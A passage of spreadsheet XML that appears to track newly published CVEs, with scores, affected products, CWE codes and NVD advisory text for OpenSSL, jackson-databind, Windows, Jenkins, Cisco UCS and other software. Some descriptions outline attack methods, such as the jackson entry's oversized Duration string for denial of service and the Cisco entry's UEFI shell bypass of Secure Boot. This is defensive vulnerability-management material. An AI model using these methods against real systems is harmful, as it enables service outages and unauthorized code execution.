        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMP password based protection verification only
checks whether the protectionAlg parameter was not NULL and not its
ASN.1 type, before treating it as a PBMParameter. A crafted message can
contain a parameter of a different type, which is then dereferenced as an
invalid pointer.
Impact summary: A remote, unauthenticated attacker can crash an application
acting as a CMP server that accepts PBM-protected messages, or a CMP client
talking to a malicious or intercepted CMP server, resulting in a Denial of
Service.
CWE: CWE-476: NULL Pointer Dereference
Description: When verifying the password-based MAC protection of a CMP
message, OpenSSL library reads the protectionAlg algorithm parameter with
X509_ALGOR_get0(), which returns both the parameter type and its value
pointer. The value is then cast to an ASN1_STRING and treated as the
expected PBMParameter after only checking that pointer is not NULL. The
parameter type returned by X509_ALGOR_get0() was never consulted.
This happens during protection verification, before any MAC is computed, so
no knowledge of the PBM shared secret is required; the only precondition is
that PBM verification is reachable. On the server side this is reached from
OSSL_CMP_SRV_process_request() for any application that stands up a CMP
server accepting PBM-protected messages, and on the client side from CMP
response validation against a malicious or on-path (MITM) server. The
reliable consequence is a denial of service; there is no memory disclosure,
no controlled memory write, and no path to code execution. CMP is a
specialized feature that an application must explicitly enable.
FIPS impact: no
As the CMP code lives outside the FIPS module boundary, no FIPS modules
are affected by this CVE.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63076</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>36c7be3b-2937-45df-85ea-ca7133ea542c</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>jackson-databind binds a JSON string to a javax.xml.datatype.Duration or javax.xml.datatype.XMLGregorianCalendar field by passing the raw string verbatim to DatatypeFactory.newDuration(value) or newXMLGregorianCalendar(value) in CoreXMLDeserializers.Std._deserialize. These deserializers are registered by default with no opt-in, so a plain ObjectMapper or JsonMapper with no polymorphic typing and no special configuration reaches this path. The XML Schema lexical grammar permits numeric components of arbitrary length, which the JDK materializes through the native BigInteger(String) and BigDecimal(String) constructors, both quadratic in digit count. Because the digits sit inside a JSON string token rather than a JSON number token, jackson-core's StreamReadConstraints.maxNumberLength guard never applies; jackson's own NumberDeserializers call validateIntegerLength or validateFPLength before parsing a stringified number, but the XML datatype deserializer omits that pre-check. An unauthenticated attacker can therefore submit a single request of a few megabytes, such as a Duration value consisting of the letter P followed by several million digits and the letter Y, and force tens of seconds to several minutes of single-threaded CPU work; a handful of concurrent requests can saturate a server's worker threads. This affects com.fasterxml.jackson.core:jackson-databind from 2.0.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K49"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9" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84652</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, Jenkins does not rotate the session when a user is authenticated via the "remember me" cookie, allowing attackers able to serve content on the same site as Jenkins to set a known session cookie in the victim's browser, which after the victim authenticates via the "remember me" cookie, grants the attacker access to Jenkins as that user.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84652</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Unified Extensible Firmware Interface (UEFI) Shell implementation of Cisco UCS Servers and UCS-based appliances could allow an authenticated attacker with valid credentials for a user account with the role of user or admin&amp;nbsp;or an unauthenticated attacker with physical access to an affected device to bypass UEFI Secure Boot validation checks and execute unauthorized software.
This vulnerability is due to the availability of memory write commands in the UEFI Shell while UEFI Secure Boot is enabled on a device. An attacker could exploit this vulnerability by selecting the UEFI Shell boot option at boot time and using available shell commands to modify UEFI memory variables. A successful exploit could allow the attacker to manipulate the preboot environment, overwrite UEFI Secure Boot-related memory values, and execute unauthorized software on the affected device.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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2" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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3" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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4" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50025</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-346, CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>Mousehole is a background service to update a seedbox IP for MAM and web app to manage it. Prior to version 0.4.05, Mousehole's HTTP/WebSocket management boundary is reachable without application-layer authentication or browser/LAN provenance checks. The service stores a MyAnonamouse (MAM) session cookie in state and reuses the same cookie-bearing serialization for persisted state, public API responses, and WebSocket state updates. Any client that can reach the published Mousehole port can read cookie-bearing state, connect to WebSocket state updates, replace the stored cookie, or force MAM update side effects. The deployment examples publish port 5010 broadly with Docker's `5010:5010` syntax, which can make the issue reachable on mixed-trust LAN/VPN interfaces. Version 0.4.0 patches the issue.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50025</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89261</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 exposes Elasticsearch index management endpoints in the mogu_search service without authentication, allowing remote attackers to delete, recreate, or alter the blog search index. Attackers can invoke POST endpoints to wipe the entire search index, delete specific documents, or inject malicious index entries, causing search functionality to return incorrect or no results.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89261</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89263</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 fails to authenticate requests to the /web/comment/closeEmailNotification endpoint, allowing unauthenticated attackers to disable email notifications for arbitrary users. Remote callers can modify the startEmailNotification flag in Redis cache for any user identifier to suppress reply notifications without authorization.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89263</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15439</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R62" s="5" t="inlineStr">
        <is>
